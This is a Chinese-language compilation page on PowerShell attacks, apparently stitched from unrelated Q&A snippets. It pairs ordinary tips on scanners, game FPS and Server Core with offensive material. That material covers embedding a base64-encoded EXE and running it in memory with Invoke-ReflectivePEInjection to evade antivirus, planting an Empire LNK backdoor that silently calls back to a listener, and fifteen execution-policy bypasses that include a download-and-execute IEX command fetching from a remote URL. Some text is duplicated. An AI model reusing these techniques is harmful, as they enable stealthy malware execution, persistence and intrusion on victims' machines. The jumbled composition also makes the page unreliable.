powershell挖矿攻击
1. 如何在PowerShell脚本中嵌入EXE文件
我在尝试解决一个问题,即在客户端攻击中只使用纯 PowerShell 脚本作为攻击负荷。使用 PowerShell 运行恶意代码具有很多优点,包括:
1.无需在目标上安装其他任何东西。
2.强大的引擎(例如可以直接调用 .NET 代码)。
3.可以使用 base64 编码命令来混淆恶意命令,使恶意命令变的不容易被发现。这同样也是一种可以避免使用特殊字符的方法,尤其是在一个涉及多个步骤需要分离不同攻击负荷的高级攻击中。
4.可以使用Invoke-Expression将字符串解释为 Powershell
命令。从渗透测试的角度看,这可以避免在目标磁盘上编写复杂的脚本。例如:你可以使用 Powershell 下载额外的复杂脚本,然后通过调用
Invoke-Expression 解释并执行下载到内存中的脚本。这个过程同样可以躲避杀毒软件的查杀。
我们想在目标上运行一些相当复杂的功能,这些功能常是 EXE 文件的一部分。我不想直接在目标上放置一个二进制文件,因为这样可能会触发反病毒机制。所以我想将其放入 Powershell 脚本中,不过我也不想重写整个 Powershell 脚本。
最终我想到一个办法。
将二进制文件嵌入到 Powershell 脚本中,并直接通过脚本运行而不用将其写入到磁盘里。
下面演示解决步骤:
1.将二进制文件进行 base64 编码
可以使用以下函数:
function Convert-BinaryToString {
[CmdletBinding()] param (
[string] $FilePath
)
try {
$ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
}
catch {
throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
}
if ($ByteArray) {
$Base64String = [System.Convert]::ToBase64String($ByteArray);
}
else {
throw '$ByteArray is $null.';
}
Write-Output -InputObject $Base64String;
}
2. 按如下过程创建一个新的脚本
1.用上一步的方法将 EXE 文件转为字符串;
2.准备 Invoke-ReflectivePEInjection(Powersploit project 的一部分);
3.将字符串转为字节数组;
4.调用 Invoke-ReflectivePEInjection。
所以,二进制文件只是 Powershell 脚本中的一段字符串,在将字符串解码为二进制数组后,就可以调用 Invoke-ReflectivePEInjection 直接在内存中运行。
最后看起来像这样:
# base64 编码的二进制文件
$InputString = '...........'
function Invoke-ReflectivePEInjection
{
......
......
......
}
# 将二进制字符串转为字节数组
$PEBytes = [System.Convert]::FromBase64String($InputString)
# 在内存中运行 EXE
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
现在就可以在目标上运行脚本了:
powershell -ExecutionPolicy Bypass -File payload.ps1
根据嵌入的不同二进制文件,可能会出现以下错误:
PE platform doesn’t match the architecture of the process it is being loaded in (32/64bit)
解决这个问题只需要运行 32 位的 PowerShell 即可。
下面是我将 plink.exe 嵌入 payload.ps1 的例子:
2. windows powershell 怎么扫描共享文件夹
扫描的文件传不到电脑里的共享文件夹,原因如下:1、再次检查扫描仪的内部设置,在点击保存时的文件夹是否勾选上。
2、检查电脑上的共享文件夹名称是否被恶意更改过。解决 办法:纠正共享文件夹名称。
3、利用 杀毒软件进行全盘扫描,是否被病毒感染或黑客攻击。解决 办法:重启电脑,再次扫描。
4、检查电脑扫描程序,是否被恶意删除扫描程序。解决办法,重启电脑,重新安装扫描软件 。
3. 如何创建Powershell持久隐蔽后门
1、安装后门
这次需要用到powershell攻击框架Empire,使用Empire/data/mole_source/persistence/Invoke-BackdoorLNK.ps1这个脚本
-LNKPath是要利用的lnk的路径,每次打开这个lnk文件时都会执行原始的应用程序和 -Enc后面的恶意powershell代码
先通过empire生成反弹的powershell代码
./empire 进入empire
输入listeners 进入监听界面 设置好ip与端口
launcher 1 生成power shell代码
这里我们只复制 -Enc 后面的代码
然后执行
看到以上界面就代表后门安装完成
当我们运行navicat快捷方式的同时 可以看到powershell.exe已经悄悄的链接empire
4. one system care是什么东西
是一种下载了会自动在电脑植入恶意挖矿木马和修改用户DNS配置强行插入广告木马的工具。不建议下载。
启动脚本定时去执行请求URL,木马作者只需要将URL设置成木马可下载,用户就会中招。
5. 如何在 Server Core 上装 PowerShell
Server Core是在Windows Server 2008系统上开始引入的极小的服务器安装选项,server core 的作用就是为特定的服务提供一个可执行的功能有限的低维护服务器环境,为我们带来了提升服务器的稳定性、减少软件维护量、降低被攻击风险、更少的空间占有率等益处
在 Windows Server 2012 中,管理员可以直接在Server Core版本和GUI版本之间切换,不需要在进行重装系统。简化了管理员选择操作系统界面版本的复杂程度和今后进行切换的难易程度,这些操作只需要Powershell就可以完成。
1.首先,来看看在GUI界面下切换到ServerCore的操作,打开Powershell,执行Uninstall-WindowsFeature Server-Gui-Mgmt-Infra -Restart,命令完成后会自动重启服务,即切换为Server Core界面
2.重启完毕后,登录到服务器,在命令行执行sconfig进入到服务器配置,在这里可以对服务器进行配置,能够执行修改计算机名、加入域,网络设置等操作。也可以运行MMC.exe并使用任何管理单元。
3.接下来,退出到命令行,输入powershell,准备进行GUI界面的还原。
6. 为什么我打英雄联盟的FPS那么低
1、检查后台进程、看看是否有挖矿等占用显卡的进程。例如占用大量cpu的powershell.exe
2、检查驱动,是否兼容,这里可以选择直接卸载驱动,去官网勾选你的显卡,去下载对应驱动会好的多,我之前用360驱动大师,安装的驱动,居然不兼容,各种重启蓝屏。
3、用dx修复工具修复一下。
4、我觉得你应该不会犯这种低级错误,就是把显示器接口插在了主板上,而不是显卡上。。。
7. 如何在PowerShell脚本中嵌入EXE文件
1.将二进制文件进行 base64 编码
可以使用以下函数:
function Convert-BinaryToString {
[CmdletBinding()] param (
[string] $FilePath
)
try {
$ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
}
8. 哪些方法可以绕过PowerShell Execution Policy
默认情况下,PowerShell禁止PowerShell脚本在Windows系统中执行。这会妨碍渗透测试员,系统管理员,和开发人员……在这里我将在没有系统管理员权限的情况下通过15个方法来绕过PowerShell execution policy。
我肯定还有很多的技术漏了(或者我根本不知道),但希望这篇文章将给需要它的人提供一个良好的开端。
什么是PowerShell Execution Policy?
PowerShell execution policy 是用来决定哪些类型的PowerShell脚本可以在系统中运行。默认情况下,它是“ Restricted ”(限制)的。然而,这个设置从来没有算是一种安全控制。相反,它会阻碍管理员操作。这就是为什么我们有这么多绕过它的方法。包括一些微软提供的。更多关于在PowerShell执行政策设置,默认的安全控制的设置。我建议阅读Carlos Perez的 博客 。他提供了一个很好的概述。
为什么要绕过执行政策?
我听到的最多的原因是因为人们希望实现自动化操作,但下面还有一些其他原因致使PowerShell在管理员、渗透测试员、黑客们手中如此流行:
支持Windows
能调用Windows API
能在不写入磁盘的情况下运行命令
能避免病毒的检测
总是被标记为"信任"。是大部分应用程序的白名单一员。
曾写出过许多的开源渗透测试工具包
如何查看Execution Policy
在能够使用所有完美功能的PowerShell之前,攻击者可以绕过“Restricted”(限制)execution
policy。你可以通过PowerShell命令“executionpolicy“看看当前的配置。如果你第一次看它的设置可能设置为
“Restricted”(限制),如下图所示
PS C:> Get-ExecutionPolicy
同样值得注意的是execution policy可以在系统中设置不同的级别。要查看他们使用下面的命令列表。更多信息可以点击这里查看微软的“Set-ExecutionPolicy” 。
Get-ExecutionPolicy -List | Format-Table -AutoSize
实验环境说明
在下面的例子中我将使用一个名为runme.ps1的脚本,它将包含以下PowerShell命令来写出一个消息到控制台:
Write-Host "My voice is my passport, verify me."
当我试图在一个带有默认execution policy的系统上执行它时,我得到以下错误:
如果你目前的execution
policy是开放的,你想让它更严格的测试,下面的技巧,然后从管理员PowerShell控制台运行命令“Set-ExecutionPolicy
Restricted”。OK,那我接着BB了,接下来我会通过15种方法来绕过PowerShell execution policy的限制。
绕过PowerShell Execution Policy
1. 把脚本直接粘贴到交互式的PowerShell控制台
复制并粘贴你的PowerShell脚本为一个交互式控制台如下图所示。但是,请记住,你将被当前用户权限限制。这是最基本的例子,当你有一个交互控制台时,可以方便快速地运行脚本。此外,这种技术不会更改配置或需要写入磁盘。
2. Echo脚本并PowerShell的标准输入
简单的ECHO脚本到PowerShell的标准输入。这种技术不会导致配置的更改或要求写入磁盘。
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
3. 从文件中读取脚本并通过PowerShell的标准输入
使用Windows的"type"命令或PowerShell的"Get-Content"命令来从磁盘读取你的脚本并输入到标准的
PowerShell中,这种技术不会导致配置文件的更改,但是需要写入磁盘。然而,如果你想试图避免写到磁盘,你可以从网络上读取你的脚本。
例1:Get-Content Powershell命令
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
例2:Type 命令
TYPE .runme.ps1 | PowerShell.exe -noprofile -
4. 从网络上下载脚本并通过IEX执行它
这种技术可以用来从网上下载一个PowerShell脚本并执行它无需写入磁盘。它也不会导致任何配置更改。我已经看到它有许多创造性的使用方法,但最近看到它被引用到一个不错的Matt Graeber的PowerSploit博客上。
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
5. 使用Command
这种技术和通过复制和粘贴来执行一个脚本是非常相似的,但它可以做没有交互式控制台。这是很好的方式适合执行简单的脚本,但更复杂的脚本通常容易出现错误。这种技术不会导致配置更改或要求写入磁盘。
例1:完整的命令
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
例2:简短的命令
Powershell -c "Write-Host 'My voice is my passport, verify me.'"
6. 使用EncodeCommand
这和使用"Command"命令非常像,但它为所有的脚本提供了一个Unicode /
Base64编码串。通过这种方式加密你的脚本可以帮你绕过所有通过"Command"执行时会遇到的错误。这种技术不会导致配置文件的更改或要求写入磁
盘。下面的示例来自 Posh-SecMod。
例1: 完整的命令
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
例2: 通过简短的命令使用编码串
powershell.exe -Enc
7. 使用Invoke-Command命令
我在obscuresec的博客看到了这种有趣的方法。这是一个典型的通过交互式PowerShell控制台执行的方法。但最酷的是当PowerShell远程处理开启时我可以用它来对远程系统执行命令。这种技术不会导致配置更改或要求写入磁盘。
invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
基于obscuresec博客,下面的命令还可以用来抓取从远程计算机的execution policy并将其应用到本地计算机。
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force
8. 使用Invoke-Expression命令
这是另一个典型的通过交互式PowerShell控制台执行的方法。这种技术不会导致配置更改或要求写入磁盘。下面我列举了一些常用的方法来通过Invoke-Expression绕过execution policy。
例1:使用Get-Content的完整命令
Get-Content .runme.ps1 | Invoke-Expression
例2:使用Get-Content的简短的命令
GC .runme.ps1 | iex
9.使用"Bypass"标记Execution Policy
当你通过脚本文件执行命令的时候这是一个很好的绕过execution policy的方法。当你使用这个标记的时候"没有任何东西被阻止,没有任何警告或提示"。这种技术不会导致配置更改或要求写入磁盘。
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
10. 使用"Unrestricted"标记Execution Policy
这类似于"Bypass"标记。当你使用这个标记的时候,它会"加载所有的配置文件并运行所有的脚本。如果你运行从网上下载的一个未被签名的脚本,它会提示你需要权限",这种技术不会导致配置的更改或要求写入磁盘。
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
11. 使用 "Remote-Signed"标记Execution Policy
创建你的脚本,然后按照教程的操作。最后,使用下面的命令运行它:
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
12. 通过交换AuthorizationManager禁用ExecutionPolicy
这真是一个我碰到的来自http://www.nivot.org的创意。下面的函数可以通过一个交互式的PowerShell来执行。一旦函数
被调用"AuthorizationManager"就会被替换成空。最终结果是,接下来的会话基本上不受execution
policy的限制。然而,它的变化将被应用于会话的持续时间。
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} Disable-ExecutionPolicy .runme.ps1
13. 把ExcutionPolicy设置成Process Scope
正如我们在引言中所看到的,执行策略可以应用于多层次的。这包括你控制的过程。使用这种技术,执行策略可以被设置为您的会话的持续时间不受限制。此外,它不会导致在配置更改,或需要写入到磁盘。我最初发现这种技术来自r007break博客。
Set-ExecutionPolicy Bypass -Scope Process
14. 通过命令设置ExcutionPolicy为CurrentUser Scope
这种方法和上面那种类似。但是这种方法通过修改注册表将当前用户环境的设置应用到当前用户的环境中。此外,它不会导致在配置更改,或需要写入到磁盘。我最初发现这种技术来自r007break博客。
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
15. 通过注册表设置ExcutionPolicy为CurrentUser Scope
在这个例子中,我展示了如何通过修改注册表项来改变当前用户的环境的执行策略。
HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell
总结
我觉得这里的主题是:使用的execution policy不一定是开发商,管理员,或者。微软从来没有打算将它成为一个安全控制。这就是为什么有这么多选择绕过它。微软很好地提供了一些本地选项和安全社区也拿出一些真正有趣的把戏。